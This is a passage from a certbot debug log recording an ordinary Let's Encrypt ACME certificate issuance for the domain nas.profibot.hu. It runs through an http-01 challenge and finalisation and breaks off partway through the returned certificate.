{\n "type": "dns",\n "value": "nas.profibot.hu"\n }\n ]\n}' +2025-12-25 04:09:23,373:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMFdTZUttWDJxV1VQbE10OFQ5YTJXd3hDQ1F2MjNBUm9TdDhzUFdXUjZTQnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "TFfao0EZ-8OZiT6Q8BOSCeyJUroydDm4xs_rasggfzRWdzWJqIxjv5nsVcmavBK0jpOrzQfp8wxBFE_iXaZ587GQnKAmAUOrmk3uiKk-QQBRPcAm9UgguQ6NN1GEV-r0V1JjZ8-Ps7Z1DCYc5EvA71zmyaA0yOAnJl0kcTD7YzZzm5EO8COPAE_H3jIPyV4d0CcVydNgQ3e--S8B0x7JbjpAA2hzRR2kXAuUObG4lfd261i5NynWejGn_XjfGjeROYdHHDNY8P1b99vKDWru3shjwtg21tlAQdUZh8LGtVgfBr02YNlejCYxnhxuIpwGkp-k85ll8_d89mt31qoz4Q", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcy5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2025-12-25 04:09:23,662:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2025-12-25 04:09:23,663:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:23 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430466376 +Replay-Nonce: GxwILcG0FE92gd3eU2CpIkiOFMDIjR8zA63O-eD5YqaFyP6rfXA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-01T04:09:23Z", + "identifiers": [ + { + "type": "dns", + "value": "nas.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430466376" +} +2025-12-25 04:09:23,663:DEBUG:acme.client:Storing nonce: GxwILcG0FE92gd3eU2CpIkiOFMDIjR8zA63O-eD5YqaFyP6rfXA +2025-12-25 04:09:23,664:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:23,666:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMEZFOTJnZDNlVTJDcElraU9GTURJalI4ekE2M08tZUQ1WXFhRnlQNnJmWEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4MzEwMTA2In0", + "signature": "Q59gd_eupuJUzVfnoWCofcRrpZ-JWls1kpsEBkpzaR5AdMNBOjlFMJ7v5iE5xP59g2SWgq4jobCY3CWdVCXHwhNPT-dgFFmDxD0KklWq7ipWKGQJpFS6I2Ebkd7O9cyM2uVC8MvVQBtbLO_4ymcdMbPnjBR1jpbendS9GVaHSsJH2RNibaM-jg6OtIpT1B24R5AOxhRfqKEmreyW23b_8-WcVNIk24JDeNE_t1rwkpiSRlgHFLd1V3OYRhh-DrJWvAC9QG7hWjI_4rKplMB1PajgUX352yHDVkQXJoo_uvehMoS_n-4f9S00bQ4PsyU5DMMBz3Cg2B9_48Cvaj-WDA", + "payload": "" +} +2025-12-25 04:09:23,824:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668310106 HTTP/1.1" 200 823 +2025-12-25 04:09:23,825:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:23 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlSS3abUwkXSyiy7jDAA0_fhHsZOqcV_8Jwxn1zdWl719c +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/vdyVRA", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/wahgYg", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + } + ] +} +2025-12-25 04:09:23,825:DEBUG:acme.client:Storing nonce: IijzadlSS3abUwkXSyiy7jDAA0_fhHsZOqcV_8Jwxn1zdWl719c +2025-12-25 04:09:23,826:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/vdyVRA', 'status': 'pending', 'token': 'Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA'} +2025-12-25 04:09:23,827:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-25 04:09:23,827:INFO:certbot._internal.auth_handler:http-01 challenge for nas.profibot.hu +2025-12-25 04:09:23,827:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-25 04:09:23,828:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-25 04:09:23,830:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA +2025-12-25 04:09:23,831:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-25 04:09:23,834:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU1MzYWJVd2tYU3lpeTdqREFBMF9maEhzWk9xY1ZfOEp3eG4xemRXbDcxOWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNjY4MzEwMTA2L2dMb1YxZyJ9", + "signature": "EG7Ed-BRv2Np1QDY2H6jxjPW4oydeHZRt7S1vdrrUwOv5IIeQ45e67FF9fvII8mc0FHlRT-2AsgT3KuwUUQn_Lbf7YEYmjEM30tD4q_0cWDp-A8GU3rvJos_j293_xKC4j5GJI_QEnMDt_h5j6tGU74l4nFXCmT_fEt5CnvK8UYTBs5FSo9Z93qG5X0uoddSVi4yq39UCO763TE0z6ilDoODhcnmuLFGZnjLcnR-cfjeEoOgI8EQ2K5XtiTzeLvGtU3vucyr7drckTTnV4-gXW03zglW3_2UHH2yWH3i4cC23PMhzrLed7tC15ylK9ZbrwrZlhNgchfgSvWhHhE9FA", + "payload": "e30" +} +2025-12-25 04:09:23,982:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632668310106/gLoV1g HTTP/1.1" 200 195 +2025-12-25 04:09:23,983:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:23 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g +Replay-Nonce: IijzadlSnnnt4Lv5jvUgybUenHUp_iI_FOYJEhTX6pQG0V4xNEQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" +} +2025-12-25 04:09:23,983:DEBUG:acme.client:Storing nonce: IijzadlSnnnt4Lv5jvUgybUenHUp_iI_FOYJEhTX6pQG0V4xNEQ +2025-12-25 04:09:23,984:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-25 04:09:24,984:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:24,988:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU25ubnQ0THY1anZVZ3liVWVuSFVwX2lJX0ZPWUpFaFRYNnBRRzBWNHhORVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4MzEwMTA2In0", + "signature": "KLkqdOqCiZZiFv1pu3CD9Uljx9C5PpDMWX10p1UcvX3p9VPQFQDBjZkpTsyESwmb2CeMR5Wv1pOSthrxYp2_rxPsEQNDaU1CU-AUgMOuqt1ruX4hwEdcrCts6NRcL6JVyRcE5mXzzcPoIUTpLCH5haB0Vb3-E1UlST4gptDVF4O1XoqDMO9H3-at2wCoDJtbTLpQca7ASF5Cm1bm8jzczvHOaXWtKkzrphlL3JSAmldQkzgEKkSsuq_qJmOSnTjL91-IIbEI5fflyN2d0LkvV97OEvTtqy9IdkO65RkyAJAgy9Vh-X41x47AleNRAyvzo5figTajlkMJhyYygZayYA", + "payload": "" +} +2025-12-25 04:09:25,133:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668310106 HTTP/1.1" 200 823 +2025-12-25 04:09:25,134:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:25 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlSJYZnykNqqDEF6HJrdAjtjxxk23maCbWipwtEmH0bTvQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/wahgYg", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/vdyVRA", + "status": "pending", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA" + } + ] +} +2025-12-25 04:09:25,134:DEBUG:acme.client:Storing nonce: IijzadlSJYZnykNqqDEF6HJrdAjtjxxk23maCbWipwtEmH0bTvQ +2025-12-25 04:09:25,135:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/vdyVRA', 'status': 'pending', 'token': 'Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA'} +2025-12-25 04:09:28,136:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:28,140:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU0pZWm55a05xcURFRjZISnJkQWp0anh4azIzbWFDYldpcHd0RW1IMGJUdlEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4MzEwMTA2In0", + "signature": "j9ICCBNlDmEij4maMjEMLYeKxpVBDwcVMxj2tpxbR-VAMS5LEA_tT4HqRsCXHGGkoPnUFpQuYaA7cnXa5NsuRS5HFdrxzv1wqhaTU2XcSIJIyhoFgMZSs1wG_knflyHyR41Ovmv-HS35Wy58AmzQZbELD1oQAWZM6QN2KqJ_WzUTq6pA0psdbnxMCLW3D0P8dmBuHPSiqkdXP2ez8qWcmayUXSWbDKOXRRONq308CqRHGtDRbd-SeSuQuxolGbIDXQoGtzRTBzQSYgKivxsl8Udw2S-vciz5OrS1AsAOjBfTXIIYLuqD5QPq9HSJHA7NYKIzE2bXFeto9jyk2hiDZQ", + "payload": "" +} +2025-12-25 04:09:28,285:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668310106 HTTP/1.1" 200 770 +2025-12-25 04:09:28,286:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:28 GMT +Content-Type: application/json +Content-Length: 770 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlS8mKoPlReGMXvx75U6K7GtYNJK9i6VG9ZtrNglsnIofA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "valid", + "expires": "2026-01-24T04:09:26Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668310106/gLoV1g", + "status": "valid", + "validated": "2025-12-25T04:09:23Z", + "token": "Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA", + "validationRecord": [ + { + "url": "http://nas.profibot.hu/.well-known/acme-challenge/Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA", + "hostname": "nas.profibot.hu", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-25 04:09:28,286:DEBUG:acme.client:Storing nonce: IijzadlS8mKoPlReGMXvx75U6K7GtYNJK9i6VG9ZtrNglsnIofA +2025-12-25 04:09:28,287:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-25 04:09:28,287:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-25 04:09:28,287:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/Iot0v1Xxkb508cAeBhmdL_wNhDnThji0ZpA0RH4aSjA +2025-12-25 04:09:28,288:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-25 04:09:28,289:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJjCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEE3eB1LFmzamZEnOk\nbzuj9TOLtsYhA2FtxhQAXhD6ZRs5uBLGdEi4ek98DI0wFBGrQkN/em+ZF0a0StL6\ny4YbjEMZdYQM12Pj0GaqJupjXMn3Dadu6P4bubsU7CMJW6gUoC0wKwYJKoZIhvcN\nAQkOMR4wHDAaBgNVHREEEzARgg9uYXMucHJvZmlib3QuaHUwCgYIKoZIzj0EAwID\naQAwZgIxAP2ReBAgZaB+W81mgk6wGBqQjAW1nxhEXy588a4IOoE5/nGkC4grPpLD\nUiNY9fCo7AIxAIx+S1sOz9hkcqmIByt2svYfe+iUSozUEye5jocm0eyPkn/Spc+m\nyKmvMSzy9yRJPw==\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2025-12-25 04:09:28,289:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2025-12-25 04:10:58.289689 +2025-12-25 04:09:28,290:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJjCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEE3eB1LFmzamZEnOkbzuj9TOLtsYhA2FtxhQAXhD6ZRs5uBLGdEi4ek98DI0wFBGrQkN_em-ZF0a0StL6y4YbjEMZdYQM12Pj0GaqJupjXMn3Dadu6P4bubsU7CMJW6gUoC0wKwYJKoZIhvcNAQkOMR4wHDAaBgNVHREEEzARgg9uYXMucHJvZmlib3QuaHUwCgYIKoZIzj0EAwIDaQAwZgIxAP2ReBAgZaB-W81mgk6wGBqQjAW1nxhEXy588a4IOoE5_nGkC4grPpLDUiNY9fCo7AIxAIx-S1sOz9hkcqmIByt2svYfe-iUSozUEye5jocm0eyPkn_Spc-myKmvMSzy9yRJPw"\n}' +2025-12-25 04:09:28,294:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430466376: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsUzhtS29QbFJlR01Ydng3NVU2SzdHdFlOSks5aTZWRzladHJOZ2xzbklvZkEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDYyNDMwNDY2Mzc2In0", + "signature": "d-6mMMrfk_gXhXBYk0dVGCpoOPJVuRYgonPm17bCPlQWWIC35SE5FK1ZZ9gAa_R2Ru1vCsKjHSiUwxlZiBn-MYcEB-ytwFCu5d7tedcHmQ0Pgl-yw-hEq2XZxIvRu56xpsIIfY5DntHg6pYrtZa2dHFc4LwgAqsTwZ3NihBfFJHxOOLI1A3nkbsXTAOoA49_Wc2Aw2uwxnPMiflmeS5eVp4Ikdfo6CtGmgphZgjiFJSUOpiaJstz-iK893G4ham46-oVEutR5_oyjyo67Jo9_ACxGoTFuZROA2PuVizlwz5-l5-vgT_hWhmpHMWBorRHc-YntK4zLL7uRQr2_zqiGA", + "payload": "ewogICJjc3IiOiAiTUlJQkpqQ0JyQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFRTNlQjFMRm16YW1aRW5Pa2J6dWo5VE9MdHNZaEEyRnR4aFFBWGhENlpSczV1QkxHZEVpNGVrOThESTB3RkJHclFrTl9lbS1aRjBhMFN0TDZ5NFliakVNWmRZUU0xMlBqMEdhcUp1cGpYTW4zRGFkdTZQNGJ1YnNVN0NNSlc2Z1VvQzB3S3dZSktvWklodmNOQVFrT01SNHdIREFhQmdOVkhSRUVFekFSZ2c5dVlYTXVjSEp2Wm1saWIzUXVhSFV3Q2dZSUtvWkl6ajBFQXdJRGFRQXdaZ0l4QVAyUmVCQWdaYUItVzgxbWdrNndHQnFRakFXMW54aEVYeTU4OGE0SU9vRTVfbkdrQzRnclBwTERVaU5ZOWZDbzdBSXhBSXgtUzFzT3o5aGtjcW1JQnl0MnN2WWZlLWlVU296VUV5ZTVqb2NtMGV5UGtuX1NwYy1teUttdk1Tenk5eVJKUHciCn0" +} +2025-12-25 04:09:29,187:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/462430466376 HTTP/1.1" 200 451 +2025-12-25 04:09:29,188:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:29 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430466376 +Replay-Nonce: GxwILcG0Ajt6_1VE6pflElBE5I_-qk7Gr4hRN1jIsv84fgp-IEM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T04:09:23Z", + "identifiers": [ + { + "type": "dns", + "value": "nas.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430466376", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7" +} +2025-12-25 04:09:29,189:DEBUG:acme.client:Storing nonce: GxwILcG0Ajt6_1VE6pflElBE5I_-qk7Gr4hRN1jIsv84fgp-IEM +2025-12-25 04:09:30,190:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:30,193:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430466376: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMEFqdDZfMVZFNnBmbEVsQkU1SV8tcWs3R3I0aFJOMWpJc3Y4NGZncC1JRU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDYyNDMwNDY2Mzc2In0", + "signature": "HKh-H0saZa3IXWRp9S__qvPVxsv5NaGZFOestcFNbYWnQB5Jg8smJB8J3kpkDpTIl8BuhVPNvQKycC1H9folU94X6yPsPEGsYpoV3_SE5Y1e2r1gRcGfP2O_fglMG0JnRbzul7lv_aN_225E_ngE7yek3nxOFf94jbQjesLZNP57ml00YTKSELFC09F6zO4huUu3Mdb7TeaBrWoWbAG_HYWb7y4PYWQTpEkRx8jO0SZNoi0NdmHJzwB6UxdgdMJ1d8SenHX2apTzMcrIGM-WrTUs9pLv1LA5c4EIRwmyWydyPDEnyBzJPeKk5bdY32iPN_84iQ1lTra0h_wWHPFMAg", + "payload": "" +} +2025-12-25 04:09:30,338:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/462430466376 HTTP/1.1" 200 451 +2025-12-25 04:09:30,339:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:30 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430466376 +Replay-Nonce: IijzadlSgPgNpiJVF92CEezFu8f0yABQFXqOZXt88aXN1NQneBQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T04:09:23Z", + "identifiers": [ + { + "type": "dns", + "value": "nas.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668310106" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430466376", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7" +} +2025-12-25 04:09:30,340:DEBUG:acme.client:Storing nonce: IijzadlSgPgNpiJVF92CEezFu8f0yABQFXqOZXt88aXN1NQneBQ +2025-12-25 04:09:30,340:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:30,344:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU2dQZ05waUpWRjkyQ0VlekZ1OGYweUFCUUZYcU9aWHQ4OGFYTjFOUW5lQlEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZkZGZjNmI2NmM3NTUyNzMwMDE1ZjhkMDhmOTcyNjdlY2M3In0", + "signature": "OLFSmueuYS_5TQ3CTZTvzFkiWcKuaSvg4Rl7QWcestp6Adlsd6eNzaKPoqM5YCXrxB4u8MLB-V-7n-p4MGsIk32pzrTnOvaP-v2n1stRtomSSDrsqY75rajDsRqAeadidoPzqDSk3GtaHslf93chI_XkisgxoxD-0AA95NEif_bI7l4dh9cArFX9h6tLC0DYZbjrklKujSt8JjErgM6WNOro-Wt7_ek1hGFN44izlsESV6kHCBd0ogk6u64_TFuar-V8kIW72RNwE4qfy95MbDoi-IVI6tXwje4SHYOc0XPBTRBD0-O-SyLSP6_OAJjsnaEqQfKnYW1veeVmMJbs5g", + "payload": "" +} +2025-12-25 04:09:30,491:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7 HTTP/1.1" 200 2909 +2025-12-25 04:09:30,492:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:30 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2909 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: IijzadlSBrGQq8EL2p_eEBtYvyOFMAyIwnHfZklZfLikEVdn6D8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsTCCAzegAwIBAgISBt38a2bHVScwAV+NCPlyZ+zHMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNTEyMjUwMzEwNThaFw0yNjAzMjUwMzEwNTdaMBoxGDAWBgNVBAMTD25h +cy5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABBN3gdSxZs2pmRJz +pG87o/Uzi7bGIQNhbcYUAF4Q+mUbObgSxnRIuHpPfAyNMBQRq0JDf3pvmRdGtErS ++suGG4xDGXWEDNdj49BmqibqY1zJ9w2nbuj+G7m7FOwjCVuoFKOCAiYwggIiMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUNSFbsdClVjQpkA4Rj9ZHAAdZCw4wHwYDVR0j +BBgwFoAUjw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTguaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD25hcy5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTguYy5sZW5jci5vcmcvNzIuY3JsMIIBDQYKKwYBBAHWeQIEAgSB +/gSB+wD5AH8AcX6V88I4im2x44RJPTHhWqliCHYtQgDgBQzQZ7WmYeIAAAGbU7KL +gwAIAAAFAAUdSgEEAwBIMEYCIQD4Pv7ndtk4R/swH+lOq/5iuSHgiloZk3fDbt+j +yiu0JQIhAN0V4ZOYvJxPBzZ3NX7jVkncIEGe3bx5Ljl2rXfnlKW/AHYA0W6ppWgH +fmY1oD83pd28A6U8QRIU1IgY9ekxsyPLlQQAAAGbU7KMHwAABAMARzBFAiBF8eaz +L3T9vhwIWjIaCG6AJb+Un4vf2s8DGivLiCWyYAIhAOycrWJg3GJAZJOW4KIzW1q2 +6Cq6ZEA/z3oWJ02wIT3XMAoGCCqGSM49BAMDA2gAMGUCMQCG2/ToF6lf10LXa7yJ 